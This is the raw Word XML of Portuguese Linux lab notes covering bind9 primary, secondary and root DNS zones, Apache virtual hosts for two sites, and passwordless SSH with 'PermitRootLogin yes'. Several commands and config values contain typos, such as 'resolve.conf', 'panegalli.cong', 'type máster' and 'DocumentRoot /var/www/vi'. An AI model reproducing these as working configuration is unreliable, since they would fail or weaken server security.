    <w:p w:rsidR="00200CB3" w:rsidRDefault="00200CB3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 w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTALAR DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A679D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SECUNDÁRIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200CB3" w:rsidRPr="006E2401" w:rsidRDefault="00200CB3" w:rsidP="00200CB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 install bind9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200CB3" w:rsidRDefault="00200CB3" w:rsidP="00200CB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d /etc/bind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200CB3" w:rsidRDefault="00200CB3" w:rsidP="00200CB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kdir slave</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2763" w:rsidRPr="006E2401" w:rsidRDefault="004E2763" w:rsidP="00200CB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named.conf.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643D2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[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 Do any local configuration here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 Consider adding the 1918 zones here, if they are not used in your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 organization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7385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//include "/etc/bind/zones.rfc1918";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 xml:space="preserve">//Zona </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiffany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>zone "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tiffany</w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.com.br" {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 xml:space="preserve">        type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>slave</w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643D2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 xml:space="preserve">        file "/etc/bind/db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.tiffany</w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.com.br";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643D2D" w:rsidRPr="0027385D" w:rsidRDefault="00643D2D" w:rsidP="00643D2D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   masters </w:t>
      </w:r>
      <w:r w:rsidR="001B19C8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{192.168.0.114; };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643D2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>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643D2D" w:rsidRDefault="00643D2D" w:rsidP="00643D2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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A679D" w:rsidRDefault="008A679D" w:rsidP="008A679D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ervice bind9 restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A679D" w:rsidRPr="008A679D" w:rsidRDefault="008A679D" w:rsidP="008A679D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8A679D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(No servidor primário)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A679D" w:rsidRPr="0027385D" w:rsidRDefault="008A679D" w:rsidP="008A679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/etc/bind/named.conf.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A679D" w:rsidRPr="0027385D" w:rsidRDefault="008A679D" w:rsidP="008A679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 xml:space="preserve">//Zona </w:t>
      </w:r>
      <w:r w:rsidR="004E2763">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiffany</w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A679D" w:rsidRPr="0027385D" w:rsidRDefault="008A679D" w:rsidP="008A679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>zone "</w:t>
      </w:r>
      <w:r w:rsidR="004E2763" w:rsidRPr="004E2763">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E2763">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tiffany</w:t>
      </w:r>
      <w:r w:rsidR="004E2763" w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.com.br </w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F753DF" w:rsidRDefault="00ED5758" w:rsidP="00F753DF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1F9B8" wp14:editId="70E609B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4647016</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>294024</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2715905" cy="286603"/>
                <wp:effectExtent l="0" t="0" r="27305" b="184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Pr="00ED5758" w:rsidRDefault="00376B85">
                            <w:pP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ED5758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&lt;- Adicionar essa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F9B8" id="Caixa de texto 3" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:365.9pt;margin-top:23.15pt;width:213.8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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRPr="00ED5758" w:rsidRDefault="00376B85">
                      <w:pP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 w:rsidRPr="00ED5758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&lt;- Adicionar essa linha</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008A679D" w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        type master;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F753DF" w:rsidRPr="0027385D" w:rsidRDefault="00F753DF" w:rsidP="00F753DF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        </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5758">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allow-transfer { 192.168.0.114; };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</w:p>
    <w:p w:rsidR="008A679D" w:rsidRPr="0027385D" w:rsidRDefault="008A679D" w:rsidP="008A679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 xml:space="preserve">        file "/etc/bind/db.</w:t>
      </w:r>
      <w:r w:rsidR="004E2763">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tiffany</w:t>
      </w:r>
      <w:r w:rsidR="004E2763" w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.com.br </w:t>
      </w:r>
      <w:r w:rsidRPr="0027385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B698F" w:rsidRDefault="008A679D" w:rsidP="008A679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27385D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B698F" w:rsidRDefault="001B698F" w:rsidP="008A679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:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B698F" w:rsidRDefault="001B698F" w:rsidP="001B698F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(No servidor secundário)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B698F" w:rsidRDefault="00ED5758" w:rsidP="001B698F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rvic</w:t>
      </w:r>
      <w:r w:rsidR="001B698F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e bind9 restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5758" w:rsidRDefault="00ED5758" w:rsidP="001B698F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4327B1" w:rsidRPr="004327B1" w:rsidRDefault="004327B1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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONFIGURAÇÃO DO CLIENTE DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004327B1" w:rsidRDefault="004327B1" w:rsidP="001B698F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vi /etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D729CA" w:rsidRDefault="00D729CA" w:rsidP="004327B1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D729CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nameserver 192.168.0.14 (server IP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D729CA" w:rsidRDefault="00D729CA" w:rsidP="00D729CA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:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41A25" w:rsidRDefault="00C41A25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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONFIGURAÇÃO DO SERVIDOR RAIZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41A25" w:rsidRDefault="00C41A25" w:rsidP="00C41A25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C41A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt install bind9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41A25" w:rsidRDefault="00C41A25" w:rsidP="00C41A25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/etc/named.conf.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41A25" w:rsidRDefault="00C41A25" w:rsidP="00C41A25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 w:rsidRPr="00C41A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zone "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>."</w:t>
      </w:r>
      <w:r w:rsidR="00BE4040">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4040" w:rsidRDefault="00BE4040" w:rsidP="00BE4040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type máster;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4040" w:rsidRDefault="00BE4040" w:rsidP="00BE4040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file "/etc/bind/db.raiz";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4040" w:rsidRDefault="00BE4040" w:rsidP="00BE4040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};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4040" w:rsidRDefault="00BE4040" w:rsidP="00BE4040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:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190899" w:rsidRDefault="00847092" w:rsidP="00847092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cp aluno@192.168.0.254:/etc/bind/*.op* /etc/bind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847092" w:rsidRDefault="00847092" w:rsidP="00847092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cp aluno@192.168.0.254:/etc/bind/db.root /etc/bind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049227F" w:rsidRDefault="0049227F" w:rsidP="00847092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color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0049227F" w:rsidRDefault="0049227F" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTALAR SERVIDOR WEB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049227F" w:rsidRDefault="0049227F" w:rsidP="00847092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49227F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt install apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46723" w:rsidRDefault="00A46723" w:rsidP="00847092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/etc/resolve.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46723" w:rsidRDefault="00A46723" w:rsidP="00A4672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nameserver 192.168.0.33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>#configurar o web server para integrá-lo ao sistema DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46723" w:rsidRPr="0065373D" w:rsidRDefault="00904733" w:rsidP="00A46723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5373D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no servidor primário</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904733" w:rsidRDefault="00904733" w:rsidP="0090473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d /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904733" w:rsidRDefault="00904733" w:rsidP="0090473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db.tiffany.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37ABE" w:rsidRDefault="00904733" w:rsidP="00904733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www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">[web server IP]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comando para adicionar o web server ao sistema DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065373D" w:rsidRDefault="00F37ABE" w:rsidP="00F37ABE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/etc/init.d/bind9 restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065373D" w:rsidRPr="0065373D" w:rsidRDefault="0065373D" w:rsidP="0065373D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5373D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no servidor web</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065373D" w:rsidRDefault="0065373D" w:rsidP="00F37ABE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d /etc/apache2/sites-available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065373D" w:rsidRDefault="0065373D" w:rsidP="00F37ABE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tiffany.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00693EB7" w:rsidRDefault="00693EB7" w:rsidP="0065373D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VirtualHost *:80&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00693EB7" w:rsidRDefault="00693EB7" w:rsidP="0065373D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erverName www.tiffany.com.br</w:t>
      </w:r>
      <w:r w:rsidR="000302E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//adicionar mais de um domínio no mesmo servidor web </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00693EB7" w:rsidRDefault="00693EB7" w:rsidP="0065373D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cumentRoot /var/www/tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00693EB7" w:rsidRDefault="00693EB7" w:rsidP="0065373D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VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000302E6" w:rsidRDefault="000302E6" w:rsidP="000302E6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panegalli.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000302E6" w:rsidRDefault="000302E6" w:rsidP="000302E6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VirtualHost *:80&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000302E6" w:rsidRDefault="000302E6" w:rsidP="000302E6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erverName www.panegalli.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000302E6" w:rsidRDefault="000302E6" w:rsidP="000302E6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cumentRoot /var/www/</w:t>
      </w:r>
      <w:r w:rsidR="000B63DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//diretório </w:t>
      </w:r>
      <w:r w:rsidR="006C18AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para armazenar as páginas html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000302E6" w:rsidRDefault="000302E6" w:rsidP="000302E6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VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C18AE" w:rsidRDefault="006C18AE" w:rsidP="006C18AE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kdir /var/www/tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C18AE" w:rsidRDefault="006C18AE" w:rsidP="006C18AE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kdir /var/www/panegalli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850D1B" w:rsidRDefault="00850D1B" w:rsidP="006C18AE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d /etc/apache2/sites-available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850D1B" w:rsidRDefault="00850D1B" w:rsidP="006C18AE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2ensite tiffany.conf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a2=apache2; en=enable; site - habilitar o site </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904733" w:rsidRDefault="00850D1B" w:rsidP="00850D1B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2ensite panegalli.cong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www.tiffany.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B63DA" w:rsidRDefault="00850D1B" w:rsidP="00850D1B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d /var/www</w:t>
      </w:r>
      <w:r w:rsidR="000B63DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B63DA" w:rsidRDefault="000B63DA" w:rsidP="00850D1B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i index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3EFC" w:rsidRPr="006A3EFC" w:rsidRDefault="00566794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!--</w:t>
      </w:r>
      <w:r w:rsidR="006A3EFC" w:rsidRPr="006A3EFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aceita caracteres fora da tabela ASC; vai usar o padrão de configuração utf8 (língua brasileira)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--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>&lt;meta charset="utf-8" /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>&lt;html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&lt;head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        &lt;title&gt; Janela 1 &lt;/title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&lt;/head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&lt;body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        &lt;center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        &lt;h1&gt; &lt;font color="#00BFFF"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                        site da Tiffany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        &lt;/h1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        &lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3EFC" w:rsidRP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 xml:space="preserve">        &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E8D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6A3EFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E8D" w:rsidRDefault="006A3EFC" w:rsidP="00817E8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p ../panegalli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005457D8" w:rsidRPr="005457D8" w:rsidRDefault="00566794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!--A</w:t>
      </w:r>
      <w:r w:rsidR="005457D8" w:rsidRPr="005457D8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ceita caracteres fora da tabela ASC; vai usar o padrão de configuração utf8 (língua brasileira)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--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>&lt;meta charset="utf-8" /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>&lt;html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&lt;head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        &lt;title&gt; Janela 1 &lt;/title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&lt;/head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&lt;body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        &lt;center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        &lt;h1&gt; &lt;font color="#9400D3"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                        site da Panegalli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        &lt;/h1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        &lt;/center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 xml:space="preserve">        &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005457D8" w:rsidRPr="005457D8" w:rsidRDefault="005457D8" w:rsidP="005457D8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  <w:r w:rsidRPr="005457D8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005457D8" w:rsidRDefault="005457D8" w:rsidP="005457D8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6A3EFC" w:rsidRDefault="006A3EFC" w:rsidP="00817E8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6A3EFC" w:rsidRDefault="006A3EFC" w:rsidP="006A3EFC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</w:p>
    <w:p w:rsidR="00850D1B" w:rsidRPr="0049227F" w:rsidRDefault="00F677E8" w:rsidP="00F677E8">
      <w:pPr>
        <w:pStyle w:val="Ttulo2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color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACESSAR UM SERVIDOR VIA SSH SEM SENHA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apt-get install openssh-server -y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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F677E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ditar o arquivo /etc/ssh/sshd_config -&gt; servidor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Port 22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#ListenAddress ::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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ListenAddress x.x.x.x (ip do servidor)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ermitRootLogin yes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opcional: logar pelo root via ssh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service ssh restart -&gt; reinicia o arquivo de configuração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service ssh status -&gt; verifica o status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F677E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gerar um par de chave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ssh-keygen -t rsa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enter ou caminho escolhido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enter ou senha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enter ou senha digitada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copiar chave pública no servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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ssh-copy-id aluno@x.x.x.x(ip do servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de destino - para onde a chave será copiada</w:t>
      </w:r>
      <w:r w:rsidRPr="00F677E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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sh user@ip_</w:t>
      </w:r>
      <w:r w:rsidR="00885E5A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
